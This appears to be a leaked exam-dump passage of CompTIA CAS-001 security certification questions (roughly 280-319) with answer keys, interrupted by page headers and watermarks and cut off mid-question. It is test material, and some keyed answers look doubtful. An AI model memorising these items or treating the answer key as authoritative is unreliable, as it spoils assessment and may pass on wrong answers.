18:51:59.159330 IP linuxwksta.42491 > 10.4.17.72.iscsi-target: Flags [.], ack 49, win 1525, options [nop,nop,TS val 16021424 ecr 215647479], length 0

18:51:59.165342 IP dns.company.com.domain > linuxwksta.48854: 3834 NXDomain 0/0/0 (41)

18:51:59.397461 ARP, Request who-has 10.4.16.58 tell 10.4.16.1, length 46

18:51:59.397597 IP linuxwksta.37684 > dns.company.com.domain: 15022+ PTR? 58.16.4.10.in- addr.arpa. (41)

Given the traffic report, which of the following is MOST likely causing the slow traffic?

A. DNS poisoningB. Improper network zoningC. ARP poisoningD. Improper LUN masking

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 280Real 147CompTIA CAS-001 ExamAn intrusion detection system logged an attack attempt from a remote IP address. One week later, the attacker successfully compromised the network. Which ofthe following MOST likely occurred?

Page 147: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. The IDS generated too many false negatives.B. The attack occurred after hours.C. The IDS generated too many false positives.D. No one was reviewing the IDS event logs.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 281A company receives a subpoena for email that is four years old. Which of the following should the company consult to determine if it can provide the email inquestion?

A. Data retention policyB. Business continuity planC. Backup and archive processesD. Electronic inventory

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 282A new company requirement mandates the implementation of multi-factor authentication to access network resources. The security administrator was asked toresearch and implement the most cost-effective solution that would allow for the authentication of both hardware and users. The company wants to leverage the PKIinfrastructure which is already well established. Which of the following solutions should the security administrator implement?

A. Issue individual private/public key pairs to each user, install the private key on the central authentication system, and protect the private key with the user'scredentials. Require each user to install the public key on their computer.

B. Deploy USB fingerprint scanners on all desktops, and enable the fingerprint scanner on all laptops. Require all network users to register their fingerprint usingthe reader and store the information in the central authentication system.

C. Issue each user one hardware token. Configure the token serial number in the user properties of the central authentication system for each user and require

Page 148: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

token authentication with PIN for Real 148CompTIA CAS-001 Examnetwork logon.

D. Issue individual private/public key pairs to each user, install the public key on the central authentication system, and require each user to install the private keyon their computer and protect it with a password.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:answer is updated.

QUESTION 283The internal audit department is investigating a possible breach of security. One of the auditors is sent to interview the following employees:

Employee A. Works in the accounts receivable office and is in charge of entering data into the finance system.

Employee B. Works in the accounts payable office and is in charge of approving purchase orders.

Employee C. Is the manager of the finance department, supervises Employee A and Employee B, and can perform the functions of both Employee A and EmployeeB.

Which of the following should the auditor suggest be done to avoid future security breaches?

A. All employees should have the same access level to be able to check on each others.B. The manager should only be able to review the data and approve purchase orders.C. Employee A and Employee B should rotate jobs at a set interval and cross-train.D. The manager should be able to both enter and approve information.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 284A company's security policy states that its own internally developed proprietary Internet facing software must be resistant to web application attacks. Which of thefollowing methods provides the MOST protection against unauthorized access to stored database information?

Page 149: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Require all development to follow secure coding practices.Real 149CompTIA CAS-001 Exam

B. Require client-side input filtering on all modifiable fields.C. Escape character sequences at the application tier.D. Deploy a WAF with application specific signatures.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 285An organization is preparing to upgrade its firewall and NIPS infrastructure and has narrowed the vendor choices down to two platforms. The integrator chosen toassist the organization with the deployment has many clients running a mixture of the possible combinations of environments. Which of the following is the MOSTcomprehensive method for evaluating the two platforms?

A. Benchmark each possible solution with the integrators existing client deployments.B. Develop testing criteria and evaluate each environment in-house.C. Run virtual test scenarios to validate the potential solutions.D. Use results from each vendor's test labs to determine adherence to project requirements.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 286An administrator has four virtual guests on a host server. Two of the servers are corporate SQL servers, one is a corporate mail server, and one is a testing webserver for a small group of developers. The administrator is experiencing difficulty connecting to the host server during peak network usage times. Which of thefollowing would allow the administrator to securely connect to and manage the host server during peak usage times?

A. Increase the virtual RAM allocation to high I/O servers.B. Install a management NIC and dedicated virtual switch.

Page 150: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Configure the high I/O virtual servers to use FCoE rather than iSCSI.D. Move the guest web server to another dedicated host.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 150CompTIA CAS-001 Exam

QUESTION 287An administrator receives a notification from legal that an investigation is being performed on members of the finance department. As a precaution, legal hasadvised a legal hold on all documents for an unspecified period of time. Which of the following policies will MOST likely be violated? (Select TWO).

A. Data Storage PolicyB. Data Retention PolicyC. Corporate Confidentiality PolicyD. Data Breach Mitigation PolicyE. Corporate Privacy Policy

Correct Answer: ABSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 288Which of the following BEST explains SAML?

A. A security attestation model built on XML and SOAP-based services, which allows for the exchange of A&A data between systems and supports FederatedIdentity Management.

B. An XML and SOAP-based protocol, which enables the use of PKI for code signing and SSO by using SSL and SSH to establish a trust model.C. A security model built on the transfer of assertions over XML and SOAP-based protocols, which allows for seamless SSO and the open exchange of data.D. A security verification model built on SSO and SSL-based services, which allows for the exchange of PKI data between users and supports XACML.

Page 151: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 289The organization has an IT driver on cloud computing to improve delivery times for IT solution provisioning. Separate to this initiative, a business case has beenapproved for replacing the existing banking platform for credit card processing with a newer offering. It is the security practitioner's responsibility to evaluate whetherthe new credit card processing platform can be hosted within a cloud environment. Which of the following BEST balances the security risk and IT drivers for cloudcomputing?

Real 151CompTIA CAS-001 Exam

A. A third-party cloud computing platform makes sense for new IT solutions. This should be endorsed going forward so as to align with the IT strategy. However,the security practitioner will need to ensure that the third-party cloud provider does regular penetration tests to ensure that all data is secure.

B. Using a third-party cloud computing environment should be endorsed going forward. This aligns with the organization's strategic direction. It also helps to shiftany risk and regulatory compliance concerns away from the company's internal IT department. The next step will be to evaluate each of the cloud computingvendors, so that a vendor can then be selected for hosting the new credit card processing platform.

C. There may be regulatory restrictions with credit cards being processed out of country or processed by shared hosting providers. A private cloud within thecompany should be considered.An options paper should be created which outlines the risks, advantages, disadvantages of relevant choices and it should recommended a way forward.

D. Cloud computing should rarely be considered an option for any processes that need to be significantly secured. The security practitioner needs to convince thestakeholders that the new platform can only be delivered internally on physical infrastructure.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 290The Universal Research Association has just been acquired by the Association of Medical Business Researchers. The new conglomerate has funds to upgrade orreplace hardware as part of the acquisition, but cannot fund labor for major software projects. Which of the following will MOST likely result in some IT resourcesnot being integrated?

A. One of the companies may use an outdated VDI.

Page 152: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. Corporate websites may be optimized for different web browsers.C. Industry security standards and regulations may be in conflict.D. Data loss prevention standards in one company may be less stringent.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 291A large enterprise introduced a next generation firewall appliance into the Internet facing DMZ. All Internet traffic passes through this appliance. Four hours afterimplementation the network engineering team discovered that traffic through the DMZ now has un-acceptable latency, and is recommending that the new firewall betaken offline. At what point in the implementation process

Real 152CompTIA CAS-001 Examshould this problem have been discovered?

A. During the product selection phaseB. When testing the applianceC. When writing the RFP for the purchase processD. During the network traffic analysis phase

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 292A company has implemented data retention policies and storage quotas in response to their legal department's requests and the SAN administrator'srecommendation. The retention policy states all email data older than 90 days should be eliminated. As there are no technical controls in place, users have beeninstructed to stick to a storage quota of 500Mb of network storage and 200Mb of email storage. After being presented with an e-discovery request from an opposinglegal council, the security administrator discovers that the user in the suit has 1Tb of files and 300Mb of email spanning over two years. Which of the followingshould the security administrator provide to opposing council?

A. Delete files and email exceeding policy thresholds and turn over the remaining files and email.

Page 153: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. Delete email over the policy threshold and hand over the remaining emails and all of the files.C. Provide the 1Tb of files on the network and the 300Mb of email files regardless of age.D. Provide the first 200Mb of e-mail and the first 500Mb of files as per policy.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 293A security administrator is tasked with securing a company's headquarters and branch offices move to unified communications. The Chief Information Officer (CIO)wants to integrate the corporate users' email, voice mail, telephony, presence and corporate messaging to internal computers, mobile users, and devices. Which ofthe following actions would BEST meet the CIO's goals while providing maximum unified communications security?

A. Create presence groups, restrict IM protocols to the internal networks, encrypt remote devices, and restrict access to services to local network and VPN clients.B. Enable discretionary email forwarding restrictions, utilize QoS and Secure RTP, allow external Real 153

CompTIA CAS-001 ExamIM protocols only over TLS, and allow port 2000 incoming to the internal firewall interface for secure SIP

C. Set presence to invisible by default, restrict IM to invite only, implement QoS on SIP and RTP traffic, discretionary email forwarding, and full disk encryption.D. Establish presence privacy groups, restrict all IM protocols, allow secure RTP on session border gateways, enable full disk encryptions, and transport encryption

for email security.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 294Ann, a Physical Security Manager, is ready to replace all 50 analog surveillance cameras with IP cameras with built-in web management. Ann has several securityguard desks on different networks that must be able to view the cameras without unauthorized people viewing the video as well. The selected IP camera vendordoes not have the ability to authenticate users at the camera level. Which of the following should Ann suggest to BEST secure this environment?

A. Create an IP camera network and deploy NIPS to prevent unauthorized access.B. Create an IP camera network and only allow SSL access to the cameras.C. Create an IP camera network and deploy a proxy to authenticate users prior to accessing the cameras.

Page 154: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Create an IP camera network and restrict access to cameras from a single management host.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 295A general insurance company wants to set up a new online business. The requirements are that the solution needs to be:

- Extendable for new products to be developed and added- Externally facing for customers and business partners to login- Usable and manageable- Be able to integrate seamlessly with third parties for non core functions such as document printing- Secure to protect customer's personal information and credit card information during transport and at rest

The conceptual solution architecture has specified that the application will consist of a traditional three tiered architecture for the front end components, an ESB toprovide services, data

Real 154CompTIA CAS-001 Examtransformation capability and legacy system integration and a web services gateway.

Which of the following security components will BEST meet the above requirements and fit into the solution architecture? (Select TWO).

A. Implement WS-Security for services authentication and XACML for service authorization.B. Use end-to-end application level encryption to encrypt all fields and store them encrypted in the database.C. Implement a certificate based solution on a smart card in combination with a PIN to provide authentication and authorization of users.D. Implement WS-Security as a federated single sign-on solution for authentication authorization of users.E. Implement SSL encryption for all sensitive data flows and encryption of passwords of the data at rest.F. Use application level encryption to encrypt sensitive fields, SSL encryption on sensitive flows, and database encryption for sensitive data storage.

Correct Answer: AFSection: (none)Explanation

Explanation/Reference:Explanation:

Page 155: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 296A retail bank has had a number of issues in regards to the integrity of sensitive information across all of its customer databases. This has resulted in the bank'sshare price decreasing in value by 50% and regulatory intervention and monitoring.

The new Chief Information Security Officer (CISO) as a result has initiated a program of work to solve the issues.

The business has specified that the solution needs to be enterprise grade and meet the following requirements:

- Be across all major platforms, applications and infrastructure.- Be able to track user and administrator activity.- Does not significantly degrade the performance of production platforms, applications, and infrastructures.- Real time incident reporting.- Manageable and has meaningful information.- Business units are able to generate reports in a timely manner of the unit's system assets.

In order to solve this problem, which of the following security solutions will BEST meet the above requirements? (Select THREE).

Real 155CompTIA CAS-001 Exam

A. Implement a security operations center to provide real time monitoring and incident response with self service reporting capability.B. Implement an aggregation based SIEM solution to be deployed on the log servers of the major platforms, applications, and infrastructure.C. Implement a security operations center to provide real time monitoring and incident response and an event correlation dashboard with self service reporting

capability.D. Ensure that the network operations center has the tools to provide real time monitoring and incident response and an event correlation dashboard with self

service reporting capabilities.E. Implement an agent only based SIEM solution to be deployed on all major platforms, applications, and infrastructures.F. Ensure appropriate auditing is enabled to capture the required information.G. Manually pull the logs from the major platforms, applications, and infrastructures to a central secure server.

Correct Answer: BCFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 297Company XYZ has employed a consultant to perform a controls assessment of the HR system, backend business operations, and the SCADA system used in the

Page 156: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

factory. Which of the following correctly states the risk management options that the consultant should use during the assessment?

A. Risk reduction, risk sharing, risk retention, and risk acceptance.B. Avoid, transfer, mitigate, and accept.C. Risk likelihood, asset value, and threat level.D. Calculate risk by determining technical likelihood and potential business impact.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 298Company XYZ has had repeated vulnerability exploits of a critical nature released to the company's flagship product. The product is used by a number of largecustomers. At the Chief Information Security Officer's (CISO's) request, the product manager now has to budget for a team of security consultants to introducemajor product security improvements.

Here is a list of improvements in order of priority:

Real 156CompTIA CAS-001 Exam1. A noticeable improvement in security posture immediately.

2. Fundamental changes to resolve systemic issues as an ongoing process

3. Improvements should be strategic as opposed to tactical

4. Customer impact should be minimized

Which of the following recommendations is BEST for the CISO to put forward to the product manager?

A. Patch the known issues and provide the patch to customers. Make a company announcement to customers on the main website to reduce the perceivedexposure of the application to alleviate customer concerns. Engage penetration testers and code reviewers to perform an in-depth review of the product. Basedon the findings, address the defects and re-test the findings to ensure that any defects have been resolved.

B. Patch the known issues and provide the patch to customers. Engage penetration testers and code reviewers to perform an in-depth review of the product.Based on the findings, address the defects and re-test the findings to ensure that the defects have been resolved. Introduce periodic code review andpenetration testing of the product in question and consider including all relevant future projects going forward.

C. Patch the known issues and provide the patch to customers. Implement an SSDLC / SDL overlay on top of the SDLC. Train architects, designers, developers,

Page 157: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

testers and operators on security importance and ensure that security-relevant activities are performed within each of the SDLC phases. Use the product as theprimary focal point to close out issues and consider using the SSDLC / SDL overlay for all relevant future projects.

D. Stop active support of the product. Bring forward end-of-life dates for the product so that it can be decommissioned. Start a new project to develop areplacement product and ensure that an SSDLC / SDL overlay on top of the SDLC is formed. Train BAs, architects, designers, developers, testers andoperators on security importance and ensure that security-relevant activities are performed within each of the SDLC phases.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 299A system administrator has installed a new Internet facing secure web application that consists of a Linux web server and Windows SQL server into a newcorporate site. The administrator wants to place the servers in the most logical network security zones and implement the appropriate security controls. Which ofthe following scenarios BEST accomplishes this goal?

A. Create an Internet zone, DMZ, and Internal zone on the firewall. Place the web server in the DMZ. Configure IPtables to allow TCP 80 and 443. Set SELinux topermissive. Place the SQL Real 157CompTIA CAS-001 Examserver in the internal zone. Configure the Windows firewall to allow TCP 80 and 443. Configure the Internet zone with ACLs of allow 80 and 443 destinationDMZ.

B. Create an Internet zone, DMZ, and Internal zone on the firewall. Place the web server in the DMZ. Configure IPtables to allow TCP 443. Set enforcementthreshold on SELinux to one. Place the SQL server in the internal zone. Configure the Windows firewall to allow TCP 1433 and 1443.Configure the Internet zone with ACLs of allow 443 destination DMZ.

C. Create an Internet zone and two DMZ zones on the firewall. Place the web server in the DMZ one. Set the enforcement threshold on SELinux to 100, andconfigure IPtables to allow TCP 80 and 443. Place the SQL server in DMZ two. Configure the Windows firewall to allow TCP 80 and 443. Configure the Internetzone with an ACL of allow 443 destination ANY.

D. Create an Internet zone and two DMZ zones on the firewall. Place the web server in DMZ one.Set enforcement threshold on SELinux to zero, and configure IPtables to allow TCP 80 and 443.Place the SQL server in DMZ two. Configure the Internet zone ACLs with allow 80, 443, 1433, and 1443 destination ANY.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Page 158: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 300The lead systems architect on a software development project developed a design which is optimized for a distributed computing environment. The securityarchitect assigned to the project has concerns about the integrity of the system, if it is deployed in a commercial cloud. Due to poor communication within the team,the security risks of the proposed design are not being given any attention. A network engineer on the project has a security background and is concerned about theoverall success of the project. Which of the following is the BEST course of action for the network engineer to take?

A. Address the security concerns through the network design and security controls.B. Implement mitigations to the security risks and address the poor communications on the team with the project manager.C. Document mitigations to the security concerns and facilitate a meeting between the architects and the project manager.D. Develop a proposal for an alternative architecture that does not leverage cloud computing and present it to the lead architect.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 301Real 158CompTIA CAS-001 ExamCompany XYZ plans to donate 1,000 used computers to a local school. The company has a large research and development section and some of the computerswere previously used to store proprietary research.

The security administrator is concerned about data remnants on the donated machines, but the company does not have a device sanitization section in the datahandling policy.

Which of the following is the BEST course of action for the security administrator to take?

A. Delay the donation until a new policy is approved by the Chief Information Officer (CIO), and then donate the machines.B. Delay the donation until all storage media on the computers can be sanitized.C. Reload the machines with an open source operating system and then donate the machines.D. Move forward with the donation, but remove all software license keys from the machines.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Page 159: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 302Continuous monitoring is a popular risk reduction technique in many large organizations with formal certification processes for IT projects. In order to implementcontinuous monitoring in an effective manner which of the following is correct?

A. Only security related alerts should be forwarded to the network team for resolution.B. All logs must be centrally managed and access to the logs restricted only to data storage staff.C. Logging must be set appropriately and alerts delivered to security staff in a timely manner.D. Critical logs must be monitored hourly and adequate staff must be assigned to the network team.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 303The Chief Information Security Officer (CISO) regularly receives reports of a single department repeatedly violating the corporate security policy. The head of thedepartment in question informs the CISO that the offending behaviors are a result of necessary business activities. The CISO assigns a junior security administratorto solve the issue. Which of the following is the BEST course of action for the junior security administrator to take?

Real 159CompTIA CAS-001 Exam

A. Work with the department head to find an acceptable way to change the business needs so the department no longer violates the corporate security policy.B. Draft an RFP for the purchase of a COTS product or consulting services to solve the problem through implementation of technical controls.C. Work with the CISO and department head to create an SLA specifying the response times of the IT security department when incidents are reported.D. Draft an MOU for the department head and CISO to approve, documenting the limits of the necessary behavior, and actions to be taken by both teams.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 304A security administrator at Company XYZ is trying to develop a body of knowledge to enable heuristic and behavior based security event monitoring of activities ona geographically distributed network. Instrumentation is chosen to allow for monitoring and measuring the network. Which of the following is the BEST methodology

Page 160: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

to use in establishing this baseline?

A. Model the network in a series of VMs; instrument the systems to record comprehensive metrics; run a large volume of simulated data through the model; recordand analyze results; document expected future behavior.

B. Completely duplicate the network on virtual machines; replay eight hours of captured corporate network traffic through the duplicate network; instrument thenetwork; analyze the results; document the baseline.

C. Instrument the operational network; simulate extra traffic on the network; analyze net flow information from all network devices; document the baseline volumeof traffic.

D. Schedule testing on operational systems when users are not present; instrument the systems to log all network traffic; monitor the network for at least eighthours; analyze the results; document the established baseline.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 305A new IDS device is generating a very large number of irrelevant events. Which of the following would BEST remedy this problem?

A. Change the IDS to use a heuristic anomaly filter.B. Adjust IDS filters to decrease the number of false positives.

Real 160CompTIA CAS-001 Exam

C. Change the IDS filter to data mine the false positives for statistical trending data.D. Adjust IDS filters to increase the number of false negatives.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 306The Chief Information Security Officer (CISO) at a software development company is concerned about the lack of introspection during a testing cycle of thecompany's flagship product. Testing was conducted by a small offshore consulting firm and the report by the consulting firm clearly indicates that limited test caseswere used and many of the code paths remained untested.

Page 161: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

The CISO raised concerns about the testing results at the monthly risk committee meeting, highlighting the need to get to the bottom of the product behavingunexpectedly in only some large enterprise deployments.

The Security Assurance and Development teams highlighted their availability to redo the testing if required.

Which of the following will provide the MOST thorough testing?

A. Have the small consulting firm redo the Black box testing.B. Use the internal teams to perform Grey box testing.C. Use the internal team to perform Black box testing.D. Use the internal teams to perform White box testing.E. Use a larger consulting firm to perform Black box testing.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 307A security code reviewer has been engaged to manually review a legacy application. A number of systemic issues have been uncovered relating to buffer overflowsand format string vulnerabilities.

The reviewer has advised that future software projects utilize managed code platforms if at all possible.

Real 161CompTIA CAS-001 ExamWhich of the following languages would suit this recommendation? (Select TWO).

A. CB. C#C. C++D. PerlE. Java

Correct Answer: BESection: (none)Explanation

Page 162: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 308A bank now has a major initiative to virtualize as many servers as possible, due to power and rack space capacity at both data centers. The bank has prioritized byvirtualizing older servers first as the hardware is nearing end-of-life.

The two initial migrations include:

- Windows 2000 hosts: domain controllers and front-facing web servers- RHEL3 hosts: front-facing web servers

Which of the following should the security consultant recommend based on best practices?

A. One data center should host virtualized web servers and the second data center should host the virtualized domain controllers.B. One virtual environment should be present at each data center, each housing a combination of the converted Windows 2000 and RHEL3 virtual machines.C. Each data center should contain one virtual environment for the web servers and another virtual environment for the domain controllers.D. Each data center should contain one virtual environment housing converted Windows 2000 virtual machines and converted RHEL3 virtual machines.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 309After being informed that the company DNS is unresponsive, the system administrator issues the following command from a Linux workstation:

Real 162CompTIA CAS-001 Exam- SSH p 2020 -l user dnsserver.company.com

Once at the command prompt, the administrator issues the below commanD.

- Service bind restart- The system returns the below response:- Unable to restart BIND

Which of the following is true about the above situation?

Page 163: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. The administrator must use the sudo command in order to restart the service.B. The administrator used the wrong SSH port to restart the DNS server.C. The service was restarted correctly, but it failed to bind to the network interface.D. The service did not restart because the bind command is privileged.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 310Which of the following is an example of single sign-on?

A. An administrator manages multiple platforms with the same username and hardware token.The same username and token is used across all the platforms.

B. Multiple applications have been integrated with a centralized LDAP directory for authentication and authorization. A user has to authenticate each time the useraccesses an application.

C. A password is synchronized between multiple platforms and the user is required to authenticate with the same password across each platform.D. A web access control infrastructure performs authentication and passes attributes in a HTTP header to multiple applications.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 311Company XYZ has just purchased Company ABC through a new acquisition. A business decision has been made to integrate the two company's networks,application, and several basic services.

The initial integration of the two companies has specified the following requirements:

Real 163CompTIA CAS-001 Exam- Company XYZ requires access to the web intranet, file, print, secure FTP server, and authentication domain resources- Company XYZ is being on boarded into Company ABC's authentication domain

Page 164: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

- Company XYZ is considered partially trusted- Company XYZ does not want performance issues when accessing ABC's systems

Which of the following network security solutions will BEST meet the above requirements?

A. Place a Company ABC managed firewall in Company XYZ's hub site; then place Company ABC's file, print, authentication, and secure FTP servers in a zone offthe firewall. Ensure that Company ABC's business partner firewalls are opened up for web intranet access and other required services.

B. Require Company XYZ to manage the router ACLs, controlling access to Company ABC resources, but with Company ABC approving the change control to theACLs. Open up Company ABC's business partner firewall to permit access to Company ABC's file, print, secure FTP server, authentication servers and webintranet access.

C. Place no restrictions on internal network connectivity between Company XYZ and Company ABC. Open up Company ABC's business partner firewall to permitaccess to Company ABC's file, print, secure FTP server, authentication servers and web intranet access.

D. Place file, print, secure FTP server and authentication domain servers at Company XYZ's hub site. Open up Company ABC's business partner firewall to permitaccess to ABC's web intranet access and other required services.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 312In developing a new computing lifecycle process for a large corporation, the security team is developing the process for decommissioning computing equipment. Inorder to reduce the potential for data leakage, which of the following should the team consider? (Select TWO).

A. Erase all files on driveB. Install of standard imageC. Remove and hold all drivesD. Physical destructionE. Drive wipe

Correct Answer: DESection: (none)Explanation

Explanation/Reference:modified.

Page 165: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

QUESTION 313A Security Manager is part of a team selecting web conferencing systems for internal use. The system will only be used for internal employee collaboration. Whichof the following are the MAIN concerns of the security manager? (Select THREE).

A. Security of data storageB. The cost of the solutionC. System availabilityD. User authentication strategyE. PBX integration of the serviceF. Operating system compatibility

Correct Answer: ACDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 314The security administrator has just installed an active\passive cluster of two firewalls for enterprise perimeter defense of the corporate network. Stateful firewallinspection is being used in the firewall implementation. There have been numerous reports of dropped connections with external clients.

Which of the following is MOST likely the cause of this problem?

A. TCP sessions are traversing one firewall and return traffic is being sent through the secondary firewall and sessions are being dropped.B. TCP and UDP sessions are being balanced across both firewalls and connections are being dropped because the session IDs are not recognized by the

secondary firewall.C. Prioritize UDP traffic and associated stateful UDP session information is traversing the passive firewall causing the connections to be dropped.D. The firewall administrator connected a dedicated communication cable between the firewalls in order to share a single state table across the cluster causing the

sessions to be dropped.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 315

Page 166: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Company XYZ is in negotiations to acquire Company ABC for $1.2millon. Due diligence activities have uncovered systemic security issues in the flagship product ofCompany ABC. It has been established that a complete product rewrite would be needed with average estimates indicating a

Real 165CompTIA CAS-001 Examcost of $1.6millon. Which of the following approaches should the risk manager of Company XYZ recommend?

A. Transfer the riskB. Accept the riskC. Mitigate the riskD. Avoid the risk

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 316Which of the following are components defined within an Enterprise Security Architecture Framework? (Select THREE).

A. Implementation run-sheetsB. Solution designsC. Business capabilitiesD. Solution architecturesE. Business requirements documentsF. Reference modelsG. Business casesH. Business vision and drivers

Correct Answer: CFHSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 317

Page 167: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

An audit at a popular on-line shopping site reveals that a flaw in the website allows customers to purchase goods at a discounted rate. To improve security the ChiefInformation Security Officer (CISO) has requested that the web based shopping cart application undergo testing to validate user input in both free form text fieldsand drop down boxes.

Which of the following is the BEST combination of tools and / or methods to use?

A. Blackbox testing and fingerprintingB. Code review and packet analyzerC. Fuzzer and HTTP interceptor

Real 166CompTIA CAS-001 Exam

D. Enumerator and vulnerability assessment

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 318An external auditor has found that IT security policies in the organization are not maintained and in some cases are nonexistent. As a result of the audit findings, theCISO has been tasked with the objective of establishing a mechanism to manage the lifecycle of IT security policies. Which of the following can be used to BESTachieve the CISO's objectives?

A. CoBITB. UCFC. ISO 27002D. eGRC

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 319In a SPML exchange, which of the following BEST describes the three primary roles?

Page 168: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. The Provisioning Service Target (PST) entity makes the provisioning request, the Provisioning Service Provider (PSP) responds to the PST requests, and theProvisioning Service Target (PST) performs the provisioning.

